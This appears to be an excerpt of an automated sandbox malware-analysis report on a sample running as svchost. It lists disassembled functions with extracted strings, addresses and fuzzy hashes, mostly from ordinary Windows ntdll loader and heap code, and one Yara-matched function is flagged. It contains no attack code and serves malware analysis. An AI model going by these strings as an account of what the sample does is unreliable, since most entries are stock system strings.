                                                                                                                  • Instruction ID: 999f04eca14c49a2ca8f355fc30e75c9ec0dcfe12cbacca1a292ff7799485455
                                                                                                                  • Opcode Fuzzy Hash: 8d95b49c85618eb2b177c53d5fc1d0be8710e1ed0688fddcce46fed617a1230c
                                                                                                                  • Instruction Fuzzy Hash: A9D1EB365006A0DFCB22EF6AC440AADFBF1FF4A700F098059E855DF252C7B4AA41DB94
                                                                                                                  Function 03C2D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 03C2D2C3
                                                                                                                  • Control Panel\Desktop\LanguageConfiguration, xrefs: 03C2D196
                                                                                                                  • @, xrefs: 03C2D2AF
                                                                                                                  • @, xrefs: 03C2D0FD
                                                                                                                  • @, xrefs: 03C2D313
                                                                                                                  • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 03C2D0CF
                                                                                                                  • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 03C2D146
                                                                                                                  • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 03C2D262
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                                  • API String ID: 0-1356375266
                                                                                                                  • Opcode ID: 9ca911d4ea253e6f3aed2be80c9bd74411197d7eb9f3fe707d973bd324702db4
                                                                                                                  • Instruction ID: af4fcbf12c9de4b1e460a68bd190f137aa02439ed57a2f21bc7c4e55b5142e14
                                                                                                                  • Opcode Fuzzy Hash: 9ca911d4ea253e6f3aed2be80c9bd74411197d7eb9f3fe707d973bd324702db4
                                                                                                                  • Instruction Fuzzy Hash: FDA19B759083559FD320DF25C488B6BBBE8BB84729F014D2EE999DA240D774DA08CF93
                                                                                                                  Function 03C49EB0 Relevance: 9.2, Strings: 7, Instructions: 499COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 03C97709
                                                                                                                  • @, xrefs: 03C49EE7
                                                                                                                  • Internal error check failed, xrefs: 03C97718, 03C978A9
                                                                                                                  • sxsisol_SearchActCtxForDllName, xrefs: 03C976DD
                                                                                                                  • minkernel\ntdll\sxsisol.cpp, xrefs: 03C97713, 03C978A4
                                                                                                                  • Status != STATUS_NOT_FOUND, xrefs: 03C9789A
                                                                                                                  • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 03C976EE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                                                                                  • API String ID: 0-761764676
                                                                                                                  • Opcode ID: 236b67388ede598e36d5e00720f3e6cdc601777bae60ffd2bd422c5ac824b44d
                                                                                                                  • Instruction ID: 823743992231dbd21af98f464be9fd376f43b41db0ce1a37e42650ee53cc8960
                                                                                                                  • Opcode Fuzzy Hash: 236b67388ede598e36d5e00720f3e6cdc601777bae60ffd2bd422c5ac824b44d
                                                                                                                  • Instruction Fuzzy Hash: B3128F75910225DFEF24CF98C885ABEB7B4FF48710F1980AAE849EF241E7349951CB64
                                                                                                                  Function 03C3EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                  • API String ID: 0-1109411897
                                                                                                                  • Opcode ID: 5668b9cd5a9855ae0e7f1aa326e5913060e24b0953e713bc0d29ff0501a1823f
                                                                                                                  • Instruction ID: 009d70cc86bfa44d507a5995e7177088723fde75edcb6e6d8237ee9bcbe0c550
                                                                                                                  • Opcode Fuzzy Hash: 5668b9cd5a9855ae0e7f1aa326e5913060e24b0953e713bc0d29ff0501a1823f
                                                                                                                  • Instruction Fuzzy Hash: 5CA22875E05629CBDF68DF2ACC887A9B7B5AF45304F1542EAD809EB250DB359E81CF00
                                                                                                                  Function 03C2F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                  • API String ID: 0-523794902
                                                                                                                  • Opcode ID: 6ccc2362abff2f898f35647126503846a5754878abdb9a2aebe473ff1938aedf
                                                                                                                  • Instruction ID: 5601b05e4e032a7c7b429a112b8deb5f94814d330cf8135b89f3dd2bb7448a73
                                                                                                                  • Opcode Fuzzy Hash: 6ccc2362abff2f898f35647126503846a5754878abdb9a2aebe473ff1938aedf
                                                                                                                  • Instruction Fuzzy Hash: 8742ED752083959FC715EF29C884A2AFBF5FF85608F08496DE486CB392D730EA41CB52
                                                                                                                  Function 03C3ADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                                                  • API String ID: 0-4098886588
                                                                                                                  • Opcode ID: 609b6179558d2b36bdaf2e4148e8a5a805fee5a9b0b587ea1ef9254c8254a378
                                                                                                                  • Instruction ID: 094cb5c574beef4f3a305ff16bf7ca5abd68ed244ffe17e2058769545b11d1b8
                                                                                                                  • Opcode Fuzzy Hash: 609b6179558d2b36bdaf2e4148e8a5a805fee5a9b0b587ea1ef9254c8254a378
                                                                                                                  • Instruction Fuzzy Hash: EC3281759042A98BEF21CB15CC98BEEB7B9AF46340F1541EAE849EB250D7719F818F40
                                                                                                                  Function 03C4B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                  • API String ID: 0-122214566
                                                                                                                  • Opcode ID: 2460bb24d65d45e29e422bc6442d141af3bc35aa1adca9010bdba2c8b564ae5e
                                                                                                                  • Instruction ID: 28b675d987838117330043e859db52ecf93edab2ec4362c1d63bf91e131efdcf
                                                                                                                  • Opcode Fuzzy Hash: 2460bb24d65d45e29e422bc6442d141af3bc35aa1adca9010bdba2c8b564ae5e
                                                                                                                  • Instruction Fuzzy Hash: 88C14A31A00315ABDF24DF69C894BBEF7A5AF46300F194069E886DF291EBB4DD44D3A1
                                                                                                                  Function 03C663FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                  • API String ID: 0-792281065
                                                                                                                  • Opcode ID: 219dccb58071c3c288220effa9c38945ba844c7743c43491f92de38d42ebd443
                                                                                                                  • Instruction ID: 401a976d6696826e40c6c12aaabc568797d04490f6c7b7937c1e4415a19dc6ef
                                                                                                                  • Opcode Fuzzy Hash: 219dccb58071c3c288220effa9c38945ba844c7743c43491f92de38d42ebd443
                                                                                                                  • Instruction Fuzzy Hash: 3B916A35A00B159BDB38EF2AD884BBEB7A1FB51728F050128E911EF781D7B49911D790
                                                                                                                  Function 03C6C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 03CA8181, 03CA81F5
                                                                                                                  • Loading import redirection DLL: '%wZ', xrefs: 03CA8170
                                                                                                                  • LdrpInitializeProcess, xrefs: 03C6C6C4
                                                                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 03CA81E5
                                                                                                                  • LdrpInitializeImportRedirection, xrefs: 03CA8177, 03CA81EB
                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 03C6C6C3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                  • API String ID: 0-475462383
                                                                                                                  • Opcode ID: d2ed629003ea68dd92e6fd7bf4bf9bce37fafc9a015559c217567559d64e1bcd
                                                                                                                  • Instruction ID: 27c9893bb2149173afc46c104941952e22cdb6c17c1ec651e4f26d593d9eebeb
                                                                                                                  • Opcode Fuzzy Hash: d2ed629003ea68dd92e6fd7bf4bf9bce37fafc9a015559c217567559d64e1bcd
                                                                                                                  • Instruction Fuzzy Hash: 5D310476744741AFC224EF28D946E2AB7E4EF94B14F050968F881EF291D620ED04D7A2
                                                                                                                  Function 03C62674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 03CA219F
                                                                                                                  • RtlGetAssemblyStorageRoot, xrefs: 03CA2160, 03CA219A, 03CA21BA
                                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 03CA21BF
                                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 03CA2165
                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 03CA2178
                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 03CA2180
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                  • API String ID: 0-861424205
                                                                                                                  • Opcode ID: c0779794cc62ccabb1866f96a7bd450aa9be9d5577c0630d80ebaaf72d91e9f3
                                                                                                                  • Instruction ID: 6916c881a41f950019498c1d2f77126f589f02c97e221302d42998ffb5c3d423
                                                                                                                  • Opcode Fuzzy Hash: c0779794cc62ccabb1866f96a7bd450aa9be9d5577c0630d80ebaaf72d91e9f3
                                                                                                                  • Instruction Fuzzy Hash: 45310336F40225BBE721CA99CC81F9EB678DB95A44F094469FB04FB241D671EE00E7A1
                                                                                                                  Function 03CB9C32 Relevance: 6.8, Strings: 5, Instructions: 542COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                                                                                  • API String ID: 0-3127649145
                                                                                                                  • Opcode ID: 48f0f7570b0a2d675e4aa783f8957edad6634bb30ea70b3b3152bbdb2374d481
                                                                                                                  • Instruction ID: d04c803764ca9c4e19fd584aa7adc3d075106e168be8da59459c491f1b4b360c
                                                                                                                  • Opcode Fuzzy Hash: 48f0f7570b0a2d675e4aa783f8957edad6634bb30ea70b3b3152bbdb2374d481
                                                                                                                  • Instruction Fuzzy Hash: 10323479A017199BDB61DF25CC88BDAB7F8FF48300F1041AAE549EB250DB71AA84CF50
                                                                                                                  Function 03C49950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                                                                  • API String ID: 0-3393094623
                                                                                                                  • Opcode ID: daffcc6d8008f06c9992b37dbbd4742425974b97aef22cd9124325e6d6057de9
                                                                                                                  • Instruction ID: b99420e510eed0d296bd3e94ff0059653329631643a302545806f0db522b9825
                                                                                                                  • Opcode Fuzzy Hash: daffcc6d8008f06c9992b37dbbd4742425974b97aef22cd9124325e6d6057de9
                                                                                                                  • Instruction Fuzzy Hash: 120257719093618FD720CF65C084BABFBE4BF89714F49896EE889CB250E770D944CB92
                                                                                                                  Function 03C551EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  • WindowsExcludedProcs, xrefs: 03C5522A
                                                                                                                  • Kernel-MUI-Language-SKU, xrefs: 03C5542B
                                                                                                                  • Kernel-MUI-Language-Disallowed, xrefs: 03C55352
                                                                                                                  • Kernel-MUI-Language-Allowed, xrefs: 03C5527B
                                                                                                                  • Kernel-MUI-Number-Allowed, xrefs: 03C55247
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                  • API String ID: 0-258546922
                                                                                                                  • Opcode ID: a90acbecf6198e53da48c34a3fd00dc92574ee55823bc74c3ff9e87cf674c41a
                                                                                                                  • Instruction ID: 80d60eb807c4320fec72bba974ecd46de9b097f89655a218400b89b5f48f5f08
                                                                                                                  • Opcode Fuzzy Hash: a90acbecf6198e53da48c34a3fd00dc92574ee55823bc74c3ff9e87cf674c41a
                                                                                                                  • Instruction Fuzzy Hash: 84F16C76D10218EFCF11DF99C980AEEBBB9FF49650F16406AE902EB250D7709E40DB94
                                                                                                                  Function 03CB4F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                                                  • API String ID: 0-2518169356
                                                                                                                  • Opcode ID: 79eb54cde1f430ea1c6f88a9ff4b3f8a5686d8bccd93161293fb002f78a7517e
                                                                                                                  • Instruction ID: cf5ee2fa00da5129fba6b056df96c66990dcde411a878010f2ec42be4a2efa03
                                                                                                                  • Opcode Fuzzy Hash: 79eb54cde1f430ea1c6f88a9ff4b3f8a5686d8bccd93161293fb002f78a7517e
                                                                                                                  • Instruction Fuzzy Hash: 0B91BE76D006199BCB25CFA9C881AFEB7B5FF4A310F594169E811EB350D735DA01CB90
                                                                                                                  Function 004012C0 Relevance: 6.4, Strings: 5, Instructions: 176COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: S-$V~il$gfff$n$sHM
                                                                                                                  • API String ID: 0-1673249879
                                                                                                                  • Opcode ID: 9336dc90434311db5c47caa4e3bab3cd5f6ffad51272377686cfd287c9676263
                                                                                                                  • Instruction ID: d8e86dd6c0f2671a4fe7bdf505f49d05537aaa01d900f8f9bb61af07074fcd76
                                                                                                                  • Opcode Fuzzy Hash: 9336dc90434311db5c47caa4e3bab3cd5f6ffad51272377686cfd287c9676263
                                                                                                                  • Instruction Fuzzy Hash: 2A61B470E1060A87DF14CF99C8505EEB771EF94304F24922BE805BF7A0E7789A81CB95
                                                                                                                  Function 03C5D7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                  • API String ID: 0-1975516107
                                                                                                                  • Opcode ID: de3940593aff8be51b9828352101068ecda1da8d1ecfee0ff1782e68e331a665
                                                                                                                  • Instruction ID: 4d37704eabfd067065bbddff75f749ae4b4470e54d57ed5fcde24c9d5df644a4
                                                                                                                  • Opcode Fuzzy Hash: de3940593aff8be51b9828352101068ecda1da8d1ecfee0ff1782e68e331a665
                                                                                                                  • Instruction Fuzzy Hash: 57510F36A00345DFDB24EFA4D48879DBBB1BF59304F294059E802EF291C770AA80CBC4
                                                                                                                  Function 03C276B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                  • API String ID: 0-3061284088
                                                                                                                  • Opcode ID: bd621102b68cd9e9e7193980f76340ea8da9f70822d7996e4849687e7923254b
                                                                                                                  • Instruction ID: e9a8cb2dd3a9e927e0358f40e721af50ff32aff61212d1e208949f8525ffdb9f
                                                                                                                  • Opcode Fuzzy Hash: bd621102b68cd9e9e7193980f76340ea8da9f70822d7996e4849687e7923254b
                                                                                                                  • Instruction Fuzzy Hash: 810128761097A0DED22AF31AA409F56BBE4DB42B74F194059E010CF692CAA4AD80D560
                                                                                                                  Function 03C470C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                  • API String ID: 0-3178619729
                                                                                                                  • Opcode ID: 007d1b1713fb3d472a1f112c5b810a44e4df7210eb4ff6ede76680b73c341911
                                                                                                                  • Instruction ID: 1f03a5d7873bcf6f2235eef059de66839e415d2f67846c08c87144ed7772d47f
                                                                                                                  • Opcode Fuzzy Hash: 007d1b1713fb3d472a1f112c5b810a44e4df7210eb4ff6ede76680b73c341911
                                                                                                                  • Instruction Fuzzy Hash: BA139970A00759CFDB29CF69C8907A9FBB1BF49304F1881A9D859EF381D735AA45CB90
                                                                                                                  Function 03C41070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                                                  • API String ID: 0-3570731704
                                                                                                                  • Opcode ID: 72645a36680e143f17e9efca8a6c2449dc5946c60accdcfb861ebe4b5e26aa6e
                                                                                                                  • Instruction ID: a1d0ae9520d3b11266be84396c5945290bf75d2e0d7382c5b70b859d1afc349c
                                                                                                                  • Opcode Fuzzy Hash: 72645a36680e143f17e9efca8a6c2449dc5946c60accdcfb861ebe4b5e26aa6e
                                                                                                                  • Instruction Fuzzy Hash: 0E923875A01268CFEB25CF19C844BA9B7B5BF45314F0A81EAD989EB390D7349E80CF51
                                                                                                                  Function 03C4A840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 03C97D56
                                                                                                                  • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 03C97D03
                                                                                                                  • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 03C97D39
                                                                                                                  • SsHd, xrefs: 03C4A885
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                                                                  • API String ID: 0-2905229100
                                                                                                                  • Opcode ID: 9a7e9fcf7fb7303b6e46e36fa7cf8e69821fa18bacf7b222178f6ca3e774e802
                                                                                                                  • Instruction ID: d2c9679ee00077479c22a5f2232fa5315c0cb8dca1835d304655d97dcd1ee2f4
                                                                                                                  • Opcode Fuzzy Hash: 9a7e9fcf7fb7303b6e46e36fa7cf8e69821fa18bacf7b222178f6ca3e774e802
                                                                                                                  • Instruction Fuzzy Hash: 25D17C7AA402199BDF24CF99C880AADF7B5FF58310F19406AE845EF351D371EA91CB90
                                                                                                                  Function 03C43D40 Relevance: 5.4, Strings: 3, Instructions: 1603COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                  • API String ID: 0-3178619729
                                                                                                                  • Opcode ID: ce9f1960e1f15b6e969be619911d77087d0caf06cb385cde991d04580c41212f
                                                                                                                  • Instruction ID: bc7919b31890d06e8981a1aad1546820ac19039130045e8dfa8f5aa80b9f4ea9
                                                                                                                  • Opcode Fuzzy Hash: ce9f1960e1f15b6e969be619911d77087d0caf06cb385cde991d04580c41212f
                                                                                                                  • Instruction Fuzzy Hash: ADE2A074A006558FDB28CF6AC890BA9FBF1FF49304F288199D849EF385D735A945CB90
                                                                                                                  Function 03C3A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                  • API String ID: 0-379654539
                                                                                                                  • Opcode ID: c5853ead38dd7d6f9be0b807a4534c3be05af2726b5684476bcc36cee8ed3f32
                                                                                                                  • Instruction ID: 8a01517463ba27e19304a8470170bb1423d67f8b7f67b32422c087714acd8aad
                                                                                                                  • Opcode Fuzzy Hash: c5853ead38dd7d6f9be0b807a4534c3be05af2726b5684476bcc36cee8ed3f32
